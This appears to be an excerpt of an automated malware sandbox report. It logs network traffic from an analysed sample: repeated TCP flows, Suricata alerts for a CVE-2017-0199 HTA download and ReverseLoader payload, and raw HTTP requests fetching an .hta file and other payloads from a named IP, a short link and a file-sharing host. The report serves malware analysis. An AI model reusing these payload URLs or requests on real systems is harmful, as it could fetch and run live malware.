Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49172
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49167

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 146.70.113.200:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
